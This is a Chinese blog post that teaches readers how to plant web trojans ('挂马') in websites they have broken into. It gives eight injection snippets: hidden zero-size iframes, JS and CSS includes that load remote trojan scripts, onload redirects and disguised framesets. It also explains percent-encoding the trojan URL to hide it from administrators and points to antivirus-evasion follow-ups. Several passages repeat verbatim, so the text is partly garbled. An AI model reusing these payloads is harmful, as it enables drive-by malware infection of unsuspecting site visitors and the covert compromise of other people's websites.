怎样挂马
1.框架挂马:
<iframe src=网马地址 width=0 height=0></iframe>
<iframe src=网马地址 width=0 height=0></iframe>
2.js文件挂马:
首先将以下代码
document.write("<iframe width='0' height='0' src='网马地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
首先将以下代码
document.write("<iframe width='0' height='0' src='网马地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
3.body挂马:
<body onload="window.location='网马地址';"></body>
<body onload="window.location='网马地址';"></body>
4.隐蔽挂马:
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="网马地址/"></iframe>';
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="网马地址/"></iframe>';
5.css中挂马:
body {
background-image: url('javascript:document.write("<script
src=http://www.XXX.net/muma.js></script>")')}
background-image: url('javascript:document.write("<script
src=http://www.XXX.net/muma.js></script>")')}
6.JAVA挂马:
<SCRIPT language=javascript>
window.open ("网马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
window.open ("网马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
7.图片伪装:
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
8.伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
这里我给大家说到了8种常用的方法,我详细说下第1种方法:
<iframe src=网马地址 width=0 height=0></iframe>,熟悉HTML语言的朋友都应该知道这是一个框架结构,
它的标准格式是:<iframe src=URL name=iframename>…</iframe>,就是说在网页中调用了另外一个网页框架,我们看上面的代
码,"src=网马地址":要调用打开的网页,也就是我们的网页木马,"width=0 height=0"宽和高都为0,也就是说我们把这一
句话插入到一个正常的网页后,我们在打开这个正常网页的同时,打开了我们的木马网页,木马网页的宽和高为0,表示不会显示
出来,其实已经在后台打开了,那么我们的木马也就运行了。
我们来改变宽和高的大小看一下效果,看我操作。。。。。。。。。。
有时网站管理员会看主页的代码,看到这样一句也就是说他的网站被挂马了,也就会看到你的网页木马的地址,我们不妨给地址加
密一下,用到的是牛族字符转换器,转换后我们就可以将这样的代码插入到正常网页中,这里的位置是随意的。
<iframe src=http://%77%77%77%2E%68%6F%6E%6B%65%72%62%61%73%65%2E%6E%65%74%2F1%2E%68%74%6D width=0 height=0
></iframe>
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
这里我给大家说到了8种常用的方法,我详细说下第1种方法:
<iframe src=网马地址 width=0 height=0></iframe>,熟悉HTML语言的朋友都应该知道这是一个框架结构,
它的标准格式是:<iframe src=URL name=iframename>…</iframe>,就是说在网页中调用了另外一个网页框架,我们看上面的代
码,"src=网马地址":要调用打开的网页,也就是我们的网页木马,"width=0 height=0"宽和高都为0,也就是说我们把这一
句话插入到一个正常的网页后,我们在打开这个正常网页的同时,打开了我们的木马网页,木马网页的宽和高为0,表示不会显示
出来,其实已经在后台打开了,那么我们的木马也就运行了。
我们来改变宽和高的大小看一下效果,看我操作。。。。。。。。。。
有时网站管理员会看主页的代码,看到这样一句也就是说他的网站被挂马了,也就会看到你的网页木马的地址,我们不妨给地址加
密一下,用到的是牛族字符转换器,转换后我们就可以将这样的代码插入到正常网页中,这里的位置是随意的。
<iframe src=http://%77%77%77%2E%68%6F%6E%6B%65%72%62%61%73%65%2E%6E%65%74%2F1%2E%68%74%6D width=0 height=0
></iframe>
还有另外的七种方法,我们依情况而定,譬如说我们入侵的一个网站里面有很多的JS文件,那么我们使用JS挂马就比较隐蔽了,还
有就是有些网站是一个图片网站,或者说网站模板很好看,那么它的CSS样式一定很多,所以说不同的情况我们运用不同的方法,
时间关系我这里就只说这么多了,大家下去自己每个方法都实践一次,这样才会有进步。
课程发散:
1.最新的网马生成器的使用
2.htm网马免杀方法(如:拆分特征码,Escape加密等)
3.不通过生成器,在得到漏洞信息后,自己写网页木马。
4.同样的方法挂不同的木马(如:QQ木马)
随课程附有:《挂马方式和系统判断等代码》代码,自己多研究下。
发贴者:HuTao 时间
16:58
0 条评论:
发表评论
订阅 博文评论 [Atom]
<< 主页